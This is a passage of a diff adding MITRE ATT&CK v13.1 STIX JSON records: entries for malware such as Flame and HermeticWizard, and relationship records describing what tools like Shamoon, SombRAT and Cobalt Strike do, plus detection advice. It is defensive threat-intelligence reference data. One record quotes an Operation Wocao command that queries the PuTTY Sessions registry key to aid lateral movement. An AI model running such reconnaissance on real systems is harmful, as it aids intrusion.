NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a" + }, + { + "source_name": "NCSC GCHQ Small Sieve Jan 2022", + "description": "NCSC GCHQ. (2022, January 27). Small Sieve Malware Analysis Report. 
Retrieved August 22, 2022.", + "url": "https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf" + }, + { + "source_name": "Mandiant UNC3313 Feb 2022", + "description": "Tomcik, R. et al. (2022, February 24). Left On Read: Telegram Malware Spotted in Latest Iranian Cyber Espionage Activity. Retrieved August 18, 2022.", + "url": "https://www.mandiant.com/resources/telegram-malware-iranian-espionage" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498.json new file mode 100644 index 0000000000000000000000000000000000000000..d2ac61e1092d81ac260af4cf2b3ee056214f4f09 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498.json 
@@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--d1ffc22f-9cfa-4fb3-b8c1-fa44ba8da8f8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-12T17:51:18.408Z", + "name": "Flame", + "description": "[Flame](https://attack.mitre.org/software/S0143) is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "Flame", + "Flamer", + "sKyWIper" + ], + "type": "malware", + "id": "malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498", + "created": "2017-05-31T21:33:21.973Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0143", + "external_id": "S0143" + }, + { + "source_name": "Flame", + "description": "(Citation: Kaspersky Flame)" + }, + { + "source_name": "sKyWIper", + "description": "(Citation: Kaspersky Flame) (Citation: Crysys Skywiper)" + }, + { + "source_name": "Flamer", + "description": "(Citation: Kaspersky Flame) (Citation: Symantec Beetlejuice)" + }, + { + "source_name": "Kaspersky Flame", + "description": "Gostev, A. (2012, May 28). The Flame: Questions and Answers. Retrieved March 1, 2017.", + "url": "https://securelist.com/the-flame-questions-and-answers-51/34344/" + }, + { + "source_name": "Crysys Skywiper", + "description": "sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018.", + "url": "https://www.crysys.hu/publications/files/skywiper.pdf" + }, + { + "source_name": "Symantec Beetlejuice", + "description": "Symantec Security Response. (2012, May 31). Flamer: A Recipe for Bluetoothache. 
Retrieved February 25, 2017.", + "url": "https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--ff7ed9c1-dca3-4e62-9da6-72c5d388b8fa.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--ff7ed9c1-dca3-4e62-9da6-72c5d388b8fa.json new file mode 100644 index 0000000000000000000000000000000000000000..10d507e2227e99d45ce4fa16f2d5be74a3b4a638 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--ff7ed9c1-dca3-4e62-9da6-72c5d388b8fa.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--f789c8c6-f1eb-4e99-8b1d-85efb9bf734d", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "HermeticWizard" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--ff7ed9c1-dca3-4e62-9da6-72c5d388b8fa", + "created": "2022-03-25T20:47:06.942Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0698", + "url": "https://attack.mitre.org/software/S0698" + }, + { + "source_name": "ESET Hermetic Wizard March 2022", + "url": "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine", + "description": "ESET. (2022, March 1). IsaacWiper and HermeticWizard: New wiper and worm targetingUkraine. Retrieved April 10, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[HermeticWizard](https://attack.mitre.org/software/S0698) is a worm that has been used to spread [HermeticWiper](https://attack.mitre.org/software/S0697) in attacks against organizations in Ukraine since at least 2022.(Citation: ESET Hermetic Wizard March 2022)", + "modified": "2022-04-11T00:11:44.579Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "HermeticWizard", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json b/cti-ATT-CK-v13.1/enterprise-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json new file mode 100644 index 0000000000000000000000000000000000000000..08c9a6bd16f65cb18eabaa77615f506faacc4754 
--- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json @@ -0,0 +1,18 @@ +{ + "type": "bundle", + "id": "bundle--6c91f9c3-0b14-4ef6-9e51-5e0f6859a8a0", + "spec_version": "2.0", + "objects": [ + { + "definition": { + "statement": "Copyright 2015-2023, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation." + }, + "id": "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168", + "type": "marking-definition", + "created": "2017-06-01T00:00:00.000Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "definition_type": "statement", + "x_mitre_attack_spec_version": "2.1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00038d0e-7fc7-41c3-9055-edb4d87ea912.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00038d0e-7fc7-41c3-9055-edb4d87ea912.json new file mode 100644 index 0000000000000000000000000000000000000000..179163f8eb3245e5bf06d46da46cc0b27d4b261c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00038d0e-7fc7-41c3-9055-edb4d87ea912.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--1f671a55-f788-4a4d-9006-a7a5cc1be11d", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00038d0e-7fc7-41c3-9055-edb4d87ea912", + "type": "relationship", + "created": "2021-04-27T01:56:35.810Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CheckPoint Volatile Cedar March 2015", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf", + "description": "Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021." + } + ], + "modified": "2021-04-27T01:56:35.810Z", + "description": " [Explosive](https://attack.mitre.org/software/S0569) has collected the MAC address from the victim's machine.(Citation: CheckPoint Volatile Cedar March 2015) ", + "relationship_type": "uses", + "source_ref": "malware--6a21e3a4-5ffe-4581-af9a-6a54c7536f44", + "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00069454-a469-4905-97fd-b4057e86d29b.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00069454-a469-4905-97fd-b4057e86d29b.json new file mode 100644 index 0000000000000000000000000000000000000000..684bfb6eeb522c97b77c0b6723e56e9fe1356331 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00069454-a469-4905-97fd-b4057e86d29b.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--e29a8885-59e1-480a-a83f-3e6a0ef594c3", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00069454-a469-4905-97fd-b4057e86d29b", + "type": "relationship", + "created": "2022-03-30T14:26:51.834Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.834Z", + "description": "Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--000aa4d0-315e-40d7-b2b6-76e91ecf0fe8.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--000aa4d0-315e-40d7-b2b6-76e91ecf0fe8.json new file mode 100644 index 0000000000000000000000000000000000000000..e39b793ee342aa81614036d71abeed5d26dadd43 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--000aa4d0-315e-40d7-b2b6-76e91ecf0fe8.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--12dbdc2a-0336-4c8c-9a93-eff6d0d6dd5b", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--000aa4d0-315e-40d7-b2b6-76e91ecf0fe8", + "type": "relationship", + "created": "2021-09-15T18:02:37.631Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec WastedLocker June 2020", + "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us", + "description": "Symantec Threat Intelligence. (2020, June 25). WastedLocker: Symantec Identifies Wave of Attacks Against U.S. Organizations. Retrieved May 20, 2021." + } + ], + "modified": "2021-09-15T18:02:37.631Z", + "description": "[Indrik Spider](https://attack.mitre.org/groups/G0119) used [Cobalt Strike](https://attack.mitre.org/software/S0154) to carry out credential dumping using ProcDump.(Citation: Symantec WastedLocker June 2020)", + "relationship_type": "uses", + "source_ref": "intrusion-set--01e28736-2ffc-455b-9880-ed4d1407ae07", + "target_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00192a5f-9dc0-445a-b010-d77bd08aac93.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00192a5f-9dc0-445a-b010-d77bd08aac93.json new file mode 100644 index 0000000000000000000000000000000000000000..07340751bd18ed1c61458efc4313fd1cd1ba9866 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00192a5f-9dc0-445a-b010-d77bd08aac93.json 
@@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--f2f9e75a-b164-4712-bb6a-e01970e9cac4", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00192a5f-9dc0-445a-b010-d77bd08aac93", + "type": "relationship", + "created": "2021-05-26T14:50:00.881Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BlackBerry CostaRicto November 2020", + "url": "https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced", + "description": "The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021." + }, + { + "source_name": "FireEye FiveHands April 2021", + "url": "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html", + "description": "McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021." + }, + { + "source_name": "CISA AR21-126A FIVEHANDS May 2021", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", + "description": "CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021." + } + ], + "modified": "2021-06-08T13:29:06.838Z", + "description": "[SombRAT](https://attack.mitre.org/software/S0615) can SSL encrypt C2 traffic.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)", + "relationship_type": "uses", + "source_ref": "malware--425771c5-48b4-4ecd-9f95-74ed3fc9da59", + "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--001ecf24-8276-40d2-ba05-2d20e5c53ec9.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--001ecf24-8276-40d2-ba05-2d20e5c53ec9.json new file mode 100644 index 0000000000000000000000000000000000000000..e67b87302420ff547c4b2548c58e7562f651b648 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--001ecf24-8276-40d2-ba05-2d20e5c53ec9.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--93fc73c1-4625-487c-b531-ebc13ae23b1e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--001ecf24-8276-40d2-ba05-2d20e5c53ec9", + "type": "relationship", + "created": "2021-03-26T16:48:31.963Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "MSTIC NOBELIUM Mar 2021", + "url": "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "description": "Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM\u2019s layered persistence. Retrieved March 8, 2021." + } + ], + "modified": "2021-03-26T16:48:31.963Z", + "description": "[GoldFinder](https://attack.mitre.org/software/S0597) performed HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request traveled through.(Citation: MSTIC NOBELIUM Mar 2021)", + "relationship_type": "uses", + "source_ref": "malware--b7010785-699f-412f-ba49-524da6033c76", + "target_ref": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--002142e4-3942-4c6d-913d-814c1fc93380.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--002142e4-3942-4c6d-913d-814c1fc93380.json new file mode 100644 index 0000000000000000000000000000000000000000..730a9716c5d6c80e7ea9402e000f61f87e694506 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--002142e4-3942-4c6d-913d-814c1fc93380.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--cebf1249-616f-4f30-85e4-5b2353f25095", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--002142e4-3942-4c6d-913d-814c1fc93380", + "created": "2022-04-14T16:36:05.395Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Periodically baseline instances to identify malicious modifications or additions.", + "modified": "2022-04-14T16:36:05.395Z", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--45fd904d-6eb0-4b50-8478-a961f09f898b", + "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0023f0a7-26ae-40ec-ac6e-9dacf5217fb9.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0023f0a7-26ae-40ec-ac6e-9dacf5217fb9.json new file mode 100644 index 0000000000000000000000000000000000000000..955b1d87e8b48cf69f71596e3964d037f690d08d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0023f0a7-26ae-40ec-ac6e-9dacf5217fb9.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--267a1f4f-06ad-459d-9861-24964174c7db", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0023f0a7-26ae-40ec-ac6e-9dacf5217fb9", + "type": "relationship", + "created": "2021-05-17T19:42:12.789Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cobalt Strike Manual 4.3 November 2020", + "url": "https://web.archive.org/web/20210708035426/https://www.cobaltstrike.com/downloads/csmanual43.pdf", + "description": "Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021." + } + ], + "modified": "2021-10-18T19:54:13.353Z", + "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to accept a value for HTTP Host Header to enable domain fronting.(Citation: Cobalt Strike Manual 4.3 November 2020)", + "relationship_type": "uses", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", + "target_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0024d82d-97ea-4dc5-81a1-8738862e1f3b.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0024d82d-97ea-4dc5-81a1-8738862e1f3b.json new file mode 100644 index 0000000000000000000000000000000000000000..5a1e7f2ae592a8b11621c61887d221b9beb48dd5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0024d82d-97ea-4dc5-81a1-8738862e1f3b.json 
@@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--27438f4a-74fb-4377-bbdd-0ef46e1385d8", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0024d82d-97ea-4dc5-81a1-8738862e1f3b", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/", + "description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.", + "source_name": "Palo Alto Shamoon Nov 2016" + }, + { + "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.", + "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/", + "source_name": "Unit 42 Shamoon3 2018" + } + ], + "modified": "2020-05-29T18:11:24.446Z", + "description": "[Shamoon](https://attack.mitre.org/software/S0140) obtains the system time and will only activate if it is greater than a preset date.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)", + "relationship_type": "uses", + "source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3", + "target_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--002c9202-d7a0-4181-b912-42f7d6d38339.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--002c9202-d7a0-4181-b912-42f7d6d38339.json new file mode 100644 index 0000000000000000000000000000000000000000..c6ec9aef967da85281bd4af4fc08ce97c44993e0 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--002c9202-d7a0-4181-b912-42f7d6d38339.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--0f9c9ff5-1e5e-4778-bb28-f313e8bcf849", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--002c9202-d7a0-4181-b912-42f7d6d38339", + "type": "relationship", + "created": "2019-01-29T21:47:53.704Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos Micropsia June 2017", + "url": "https://blog.talosintelligence.com/2017/06/palestine-delphi.html", + "description": "Rascagneres, P., Mercer, W. (2017, June 19). Delphi Used To Score Against Palestine. Retrieved November 13, 2018." + }, + { + "source_name": "Radware Micropsia July 2018", + "url": "https://blog.radware.com/security/2018/07/micropsia-malware/", + "description": "Tsarfaty, Y. (2018, July 25). Micropsia Malware. Retrieved November 13, 2018." + } + ], + "modified": "2019-04-17T22:05:05.904Z", + "description": "[Micropsia](https://attack.mitre.org/software/S0339) gathers the hostname and OS version from the victim\u2019s machine.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)", + "relationship_type": "uses", + "source_ref": "malware--8c050cea-86e1-4b63-bf21-7af4fa483349", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0032f447-1ab7-427d-b7ae-baa436dc2411.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0032f447-1ab7-427d-b7ae-baa436dc2411.json new file mode 100644 index 0000000000000000000000000000000000000000..955ba13cc9fc42e5cec025c66b396c16cdab6fcc --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0032f447-1ab7-427d-b7ae-baa436dc2411.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--95004796-3cec-4d58-acf0-1257adb435c9", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0032f447-1ab7-427d-b7ae-baa436dc2411", + "created": "2022-09-27T17:52:38.906Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "FoxIT Wocao December 2019", + "description": "Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China\u2019s hidden hacking groups. Retrieved October 8, 2020.", + "url": "https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-07T20:41:51.144Z", + "description": "During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors executed `/c cd /d c:\\windows\\temp\\ & reg query HKEY_CURRENT_USER\\Software\\\\PuTTY\\Sessions\\` to detect recent PuTTY sessions, likely to further lateral movement.(Citation: FoxIT Wocao December 2019)", + "relationship_type": "uses", + "source_ref": "campaign--b03d5112-e23a-4ac8-add0-be7502d24eff", + "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--003f23dd-24c7-4b3b-b703-0bf081d638f4.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--003f23dd-24c7-4b3b-b703-0bf081d638f4.json new file mode 100644 index 0000000000000000000000000000000000000000..6e0c92ed759b404d2650ba002852f6f04acabacb --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--003f23dd-24c7-4b3b-b703-0bf081d638f4.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--5e00f6e7-cf1e-480f-b786-53d3297d679b", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--003f23dd-24c7-4b3b-b703-0bf081d638f4", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "description": "O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.", + "source_name": "Symantec Elderwood Sept 2012" + } + ], + "modified": "2021-01-06T19:32:29.096Z", + "description": "(Citation: Symantec Elderwood Sept 2012)", + "relationship_type": "uses", + "source_ref": "intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484", + "target_ref": "malware--b42378e0-f147-496f-992a-26a49705395b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0040312a-e85d-4066-8203-2e66f8aa5288.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0040312a-e85d-4066-8203-2e66f8aa5288.json new file mode 100644 index 0000000000000000000000000000000000000000..63d48424586cd3efeab45ff2cd9867aa86a2b0dc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0040312a-e85d-4066-8203-2e66f8aa5288.json 
@@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--8c10a87e-9afb-4576-913a-367f460352a2", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0040312a-e85d-4066-8203-2e66f8aa5288", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Unit 42 DarkHydrus July 2018", + "description": "Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/" + }, + { + "source_name": "Unit42 DarkHydrus Jan 2019", + "url": "https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/", + "description": "Lee, B., Falcone, R. (2019, January 18). DarkHydrus delivers new Trojan that can use Google Drive for C2 communications. Retrieved April 17, 2019." + } + ], + "modified": "2019-04-24T23:55:43.191Z", + "description": 